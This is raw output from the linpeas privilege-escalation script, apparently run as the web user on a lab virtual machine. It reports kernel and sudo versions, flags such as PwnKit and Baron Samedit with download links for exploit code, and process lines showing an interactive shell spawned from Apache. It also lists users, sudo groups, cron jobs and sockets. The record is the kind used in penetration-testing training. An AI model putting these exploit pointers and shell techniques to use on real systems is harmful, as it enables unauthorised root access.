╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-74-generic (buildd@lgw01-amd64-038) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021
Distributor ID: Ubuntu
Description: Ubuntu 20.04.2 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
Potentially Vulnerable to CVE-2022-2588
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Sun Nov 20 22:20:38 CET 2022
22:20:38 up 4 days, 2:27, 0 users, load average: 0.47, 0.17, 0.05
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=b227b08c-5431-40bf-b56e-b3699d09a1b8 / ext4 errors=remount-ro 0 1
UUID=DC02-297F /boot/efi vfat umask=0077 0 1
/swapfile none swap sw 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
LANGUAGE=en_US:en
SHLVL=1
OLDPWD=/var/www
LC_CTYPE=C.UTF-8
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:17744
_=./linpeas.sh
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=8d27b9188ee447f780e6f72ea1db6a6d
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS Lambda? .......................... No
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.0 1.5 169036 11284 ? Ss Nov16 0:08 /sbin/init
root 334 0.0 1.8 35020 13784 ? S<s Nov16 0:02 /lib/systemd/systemd-journald
root 362 0.0 0.6 20984 5112 ? Ss Nov16 0:04 /lib/systemd/systemd-udevd
systemd+ 373 0.0 1.0 18408 7528 ? Ss Nov16 0:01 /lib/systemd/systemd-networkd
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+ 409 0.0 1.5 23896 11944 ? Ss Nov16 0:01 /lib/systemd/systemd-resolved
systemd+ 410 0.0 0.8 90228 6008 ? Ssl Nov16 0:01 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 419 0.0 1.3 50136 10436 ? Ss Nov16 0:00 /usr/bin/VGAuthService
root 420 0.1 0.9 238912 7244 ? Ssl Nov16 7:41 /usr/bin/vmtoolsd
root 457 0.0 0.9 238180 7296 ? Ssl Nov16 0:09 /usr/lib/accountsservice/accounts-daemon[0m
root 458 0.0 0.3 9412 2860 ? Ss Nov16 0:01 /usr/sbin/cron -f
message+ 462 0.0 0.6 7452 4548 ? Ss Nov16 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 472 0.0 2.4 31620 18156 ? Ss Nov16 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
syslog 473 0.0 0.6 224320 4940 ? Ssl Nov16 0:00 /usr/sbin/rsyslogd -n -iNONE
root 475 0.0 0.7 16476 5788 ? Ss Nov16 0:01 /lib/systemd/systemd-logind
root 512 0.0 0.4 6808 3016 ? Ss Nov16 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 515 0.0 0.9 232712 6880 ? Ssl Nov16 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 521 0.0 0.2 8428 1908 tty1 Ss+ Nov16 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 536 0.0 2.4 193604 18404 ? Ss Nov16 0:22 /usr/sbin/apache2 -k start
www-data 12739 0.0 1.6 194060 12552 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15973 0.0 0.0 2608 540 ? S 22:03 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15977 0.0 0.0 2608 604 ? S 22:03 0:00 | _ /bin/sh -i
www-data 15979 0.0 1.1 17820 8700 ? S 22:03 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15980 0.0 0.4 9904 3388 pts/2 Ss+ 22:03 0:00 | _ /bin/bash
www-data 12740 0.0 1.6 194060 12552 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15963 0.0 0.0 2608 604 ? S 22:01 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15967 0.0 0.0 2608 532 ? S 22:01 0:00 | _ /bin/sh -i
www-data 15968 0.0 1.1 17820 8684 ? S 22:01 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15969 0.0 0.4 9904 3728 pts/1 Ss+ 22:01 0:00 | _ /bin/bash
www-data 12741 0.0 1.2 194084 9564 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 12742 0.0 1.6 194084 12616 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15984 0.0 0.0 2608 540 ? S 22:08 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15988 0.0 0.0 2608 600 ? S 22:08 0:00 | _ /bin/sh -i
www-data 15989 0.0 1.1 18076 8800 ? S 22:08 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15990 0.0 0.4 10036 3692 pts/3 Ss 22:08 0:00 | _ /bin/bash
www-data 29884 0.4 0.3 3588 2612 pts/3 S+ 22:20 0:00 | _ /bin/sh ./linpeas.sh
www-data 32818 0.0 0.1 3588 1072 pts/3 S+ 22:20 0:00 | _ /bin/sh ./linpeas.sh
www-data 32822 0.0 0.4 12020 3376 pts/3 R+ 22:20 0:00 | | _ ps fauxwww
www-data 32821 0.0 0.1 3588 1072 pts/3 S+ 22:20 0:00 | _ /bin/sh ./linpeas.sh
www-data 12743 0.0 1.9 194060 14348 ? S 00:00 0:00 _ /usr/sbin/apache2 -k start
www-data 15946 0.0 0.0 2608 604 ? S 21:57 0:00 | _ sh -c uname -a; w; id; /bin/sh -i
www-data 15950 0.0 0.0 2608 604 ? S 21:57 0:00 | _ /bin/sh -i
www-data 15952 0.0 1.1 17952 8608 ? S 21:59 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 15954 0.0 0.5 9904 3736 pts/0 Ss 21:59 0:00 | _ /bin/bash
root 15961 0.0 0.5 11348 3920 pts/0 S+ 22:00 0:00 | _ sudo -l
www-data 15936 0.0 1.7 194216 12796 ? S 21:51 0:00 _ /usr/sbin/apache2 -k start
www-data 15962 0.0 1.1 194036 8280 ? S 22:01 0:00 _ /usr/sbin/apache2 -k start
www-data 15978 0.0 1.1 194036 8280 ? S 22:03 0:00 _ /usr/sbin/apache2 -k start
www-data 15983 0.0 1.1 194036 8280 ? S 22:07 0:00 _ /usr/sbin/apache2 -k start
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd process found (dump creds from memory as root)
apache2 process found (dump creds from memory as root)
sshd: process found (dump creds from memory as root)
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Sep 13 2021 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all
-rw-r--r-- 1 root root 712 Mar 27 2020 php
-rw-r--r-- 1 root root 190 Jun 27 2020 popularity-contest
/etc/cron.daily:
total 44
drwxr-xr-x 2 root root 4096 Sep 13 2021 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 539 Jul 5 2021 apache2
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jun 27 2020 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jun 27 2020 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Jun 27 2020 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2022-11-20 22:39:00 CET 18min left Sun 2022-11-20 22:09:08 CET 11min ago phpsessionclean.timer phpsessionclean.service
Mon 2022-11-21 00:00:00 CET 1h 39min left Fri 2022-11-18 15:18:12 CET 2 days ago fstrim.timer fstrim.service
Mon 2022-11-21 00:00:00 CET 1h 39min left Sun 2022-11-20 00:00:22 CET 22h ago logrotate.timer logrotate.service
Mon 2022-11-21 00:00:00 CET 1h 39min left Sun 2022-11-20 00:00:22 CET 22h ago man-db.timer man-db.service
Mon 2022-11-21 01:26:24 CET 3h 5min left Sun 2022-11-20 13:28:08 CET 8h ago apt-daily.timer apt-daily.service
Mon 2022-11-21 03:29:07 CET 5h 8min left Sun 2022-11-20 15:28:08 CET 6h ago ua-messaging.timer ua-messaging.service
Mon 2022-11-21 05:29:55 CET 7h left Sun 2022-11-20 18:10:08 CET 4h 10min ago motd-news.timer motd-news.service
Mon 2022-11-21 06:45:04 CET 8h left Sun 2022-11-20 06:26:08 CET 15h ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2022-11-21 20:12:22 CET 21h left Sun 2022-11-20 20:12:22 CET 2h 8min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2022-11-27 03:10:38 CET 6 days left Sun 2022-11-20 03:11:08 CET 19h ago e2scrub_all.timer e2scrub_all.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/dbus/system_bus_socket
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPT ION
:1.0 373 systemd-network systemd-network :1.0 systemd-networkd.service - -
:1.1 410 systemd-timesyn systemd-timesync :1.1 systemd-timesyncd.service - -
:1.2 409 systemd-resolve systemd-resolve :1.2 systemd-resolved.service - -
:1.3 457 accounts-daemon[0m root :1.3 accounts-daemon.service - -
:1.33 35650 busctl www-data :1.33 apache2.service - -
:1.4 1 systemd root :1.4 init.scope - -
:1.5 475 systemd-logind root :1.5 systemd-logind.service - -
:1.6 515 polkitd root :1.6 polkit.service - -
:1.7 472 networkd-dispat root :1.7 networkd-dispatcher.service - -
com.ubuntu.LanguageSelector - - - (activatable) - - -
io.netplan.Netplan - - - (activatable) - - -
org.freedesktop.Accounts 457 accounts-daemon[0m root :1.3 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.PolicyKit1 515 polkitd root :1.6 polkit.service - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 475 systemd-logind root :1.5 systemd-logind.service - -
org.freedesktop.network1 373 systemd-network systemd-network :1.0 systemd-networkd.service - -
org.freedesktop.resolve1 409 systemd-resolve systemd-resolve :1.2 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.4 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 410 systemd-timesyn systemd-timesync :1.1 systemd-timesyncd.service - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
li204-vmLS5.smartlearn.lan
127.0.0.1 localhost.localdomain localhost
127.0.1.1 li204-vmLS5.smartlearn.lan li204-vmLS5
192.168.110.120 li204-vmLS5.smartlearn.lan li204-vmLS5
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0 trust-ad
search smartlearn.lan
smartlearn.lan
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.110.120 netmask 255.255.255.0 broadcast 192.168.110.255
inet6 fe80::250:56ff:fe01:2001 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:01:20:01 txqueuelen 1000 (Ethernet)
RX packets 935078 bytes 57088719 (57.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 145840 bytes 8357060 (8.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 184 bytes 15240 (15.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 184 bytes 15240 (15.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::20021 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Sorry, try again.
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
vmadmin:x:1000:1000:vmadmin,,,:/home/vmadmin:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(vmadmin) gid=1000(vmadmin) groups=1000(vmadmin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1001(sudo-nopasswd)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=107(tcpdump) gid=112(tcpdump) groups=112(tcpdump)
uid=108(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=109(ftp) gid=117(ftp) groups=117(ftp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
22:20:47 up 4 days, 2:27, 0 users, load average: 0.43, 0.16, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
reboot system boot Fri Nov 4 21:04:00 2022 still running 0.0.0.0
vmadmin pts/0 Mon Sep 13 10:40:20 2021 - Tue Sep 14 06:39:07 2021 (19:58) 192.168.120.50
reboot system boot Mon Sep 13 10:39:36 2021 still running 0.0.0.0
vmadmin pts/1 Mon Sep 13 10:35:34 2021 - Mon Sep 13 10:37:53 2021 (00:02) 192.168.120.50
vmadmin pts/0 Mon Sep 13 10:06:51 2021 - Mon Sep 13 10:38:02 2021 (00:31) 192.168.120.50
reboot system boot Mon Sep 13 10:02:13 2021 - Mon Sep 13 10:38:02 2021 (00:35) 0.0.0.0
reboot system boot Mon Sep 13 10:01:57 2021 - Mon Sep 13 10:02:02 2021 (00:00) 0.0.0.0
wtmp begins Wed Jul 28 21:36:34 2021
╔══════════╣ Last time logon each user
Username Port From Latest
vmadmin pts/0 192.168.120.50 Mon Sep 13 10:40:20 +0200 2021
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.41 (Ubuntu)
Server built: 2021-07-05T07:16:56
httpd Not Found
Nginx version: nginx Not Found
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Sep 13 2021 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Sep 13 2021 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Sep 13 2021 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Jul 5 2021 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Sep 13 2021 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 72941 Aug 13 2021 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 Aug 13 2021 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 15 2019 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun 3 2021 /etc/ldap
╔══════════╣ Searching ssl/ssh files
ChallengeResponseAuthentication no
UsePAM yes
══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
